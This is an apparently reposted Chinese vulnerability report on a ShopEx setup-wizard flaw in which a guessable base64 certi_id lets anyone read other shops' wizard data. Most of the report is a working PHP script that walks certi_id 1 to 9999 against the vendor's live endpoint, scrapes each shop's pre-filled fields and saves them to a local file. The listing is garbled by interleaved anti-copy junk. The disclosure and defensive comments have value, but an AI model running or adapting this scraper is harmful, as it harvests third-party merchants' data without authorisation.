|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. _- l* \% }0 n7 ?% `( [/ T<?php
' [3 c T$ o" [) } f }7 k$ d
// Driver loop: calls ShowshopExD() once per candidate certi_id, 1..9999.
// Each iteration is one request to the wizard endpoint with only the id in
// "refer" changing. The report's point is that nothing server-side ties
// certi_id to the requester, so a sequential walk like this is both the
// symptom to alert on (many step2.php hits from one client, ids ascending)
// and the reason an ownership or signature check on certi_id is the fix.
// Listing kept as pasted; the interleaved characters appear to be forum
// anti-copy artifacts rather than part of the script.
9 K& g! o' r4 X" a x, k2 ? for ($i=1; $i < 10000; $i++) { //enumerate
9 h7 b" H8 M& \0 j: z- S7 ] G ]; y% i: ?7 \% r; N2 \1 g. T
ShowshopExD($i);% ^/ B, K4 N$ L+ i a
3 }. l$ R8 D# e# N6 _! L
}
r: q" e% ?4 X) r2 c. g& F2 x: ~6 \6 o+ w; ?. H1 i5 h
/**
 * Fetch the ShopEx setup-wizard step for one certi_id and dump the text
 * inputs it renders.
 *
 * Builds the same "refer" value the wizard itself carries — a base64-encoded
 * JSON object holding certi_id and a callback_url — requests step2.php with
 * it and, when the response contains that refer string, writes every
 * <input type="text"> name/value pair both to stdout and to c:/shopEx.txt.
 * Per the report, the endpoint accepts whatever certi_id it is handed without
 * checking that the caller is entitled to that shop's wizard data: base64 is
 * an encoding, not a secret, so it gives no protection (an insecure direct
 * object reference). The mitigation is server-side — bind certi_id to an
 * authenticated session or sign the refer payload — and the request shape
 * (one client, step2.php, only certi_id varying) is what to detect on.
 * Listing kept as pasted; the interleaved characters appear to be forum
 * anti-copy artifacts rather than code.
 *
 * @param int $cid certificate id to query; passed through intval() before use
 * @return void
 */
function ShowshopExD($cid) {
; i5 T9 \ E1 X; F+ U, E! ~: o2 ?4 K A3 K8 |8 T2 N1 ?
$url='http://guide.ecos.shopex.cn/step2.php';1 P. l: j. Y }! J( I
" k. }" \- y9 |/ V) O
// refer is plain base64 of a JSON document; anyone can construct it.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
( O/ [6 f! D# _. o2 f3 h* c8 k$ @7 C
$url = $url.'?refer='.$refer;! B8 S+ c0 s6 S# q
; u$ ^' F: `! O. a
$ch = curl_init($url);
' c5 h9 L/ x/ s4 ~1 ^ S- X/ d% q% M% {% R0 Q, B5 Z. q, Q- ~
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 l V h9 {5 l0 l2 F6 F2 f* ~. D9 u! G0 x- N: N: E
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- ~6 X/ T5 V6 }' W: _* k* b2 A6 U1 v( Q: O' l+ j5 d
$result = curl_exec($ch);4 o/ e* A2 x0 d+ f$ [# A" }% U6 |
5 R! h8 x2 J' C9 [% Q
// Body is re-encoded UTF-8 -> gb2312 first; the regexes below run on the
// converted text.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
4 l" m% e! R0 ?. G% r7 p# r* M# f8 v) h& |3 a5 [
// A response that echoes the submitted refer is treated as a live shop.
if(strpos($result,$refer))1 E# j# V, l5 G& K" l9 `5 R* D
/ I' h0 B& E! e$ Z3 `) H8 R7 L
{) p/ c8 |0 Y& p9 D* A: B
7 b# [9 r- S8 E' u $fp = fopen("c:/shopEx.txt",'ab'); //save to file" p0 }/ @$ ?/ L( p3 J: o' d
// The wizard pre-fills its text inputs from the shop's record; those value
// attributes are what the report considers exposed.
$ `, Z, ?0 z& z* E preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
1 U# F. _/ J4 W- u5 Y7 |# V7 h7 n: P2 L( S
foreach ($value[1] as $key) {
' x. ]8 w1 V& a+ @' t) v0 t9 D5 ~$ w) M3 j
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);. z' L3 p5 T5 X9 ~" c
9 s- ~$ n. F! [ echo $res[1][0].':'.$res[3][0]."\r\n";7 m9 U1 C. W/ _* V
4 o! `+ S# }0 a' g v
$col =$res[1][0].':'.$res[3][0]."\r\n"; 6 Z) y" @: S4 | h' L! h- d/ ?
! `* o/ T! h; x0 A/ L3 | fwrite($fp, $col, strlen($col));
: m% _* W. y! K2 l# ]6 @/ w% m# p0 z Z% L$ q
}
g+ g! h! ?; j' I
/ h% f& p/ V* Y5 k5 s echo '--------------------------------'."\r\n";
- H# W5 p, z: l7 R4 T& V- [! g6 o ~
fclose($fp);
5 t* h- C( ~+ K. F( c+ A! o
4 o4 Z! e' v9 G2 W) _" |& M" H0 Z2 Q }
/ J+ M6 o& Z" D' V7 X* _& O' c* C
flush();
3 p; u. U: J& t( N j: W9 h+ R0 U" ]* V* e4 R7 G( n
curl_close($ch);* E( p3 _8 N$ Q+ n. I* I
. V5 F" \( a; n4 _0 A- i8 E( A
}1 q T, ~/ v+ R' s8 c! d- h) y
: x* S# K( g. J6 G1 s( u `: S5 B3 c
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
. \) d7 Q8 u' b! b) j6 D$ b' x |
|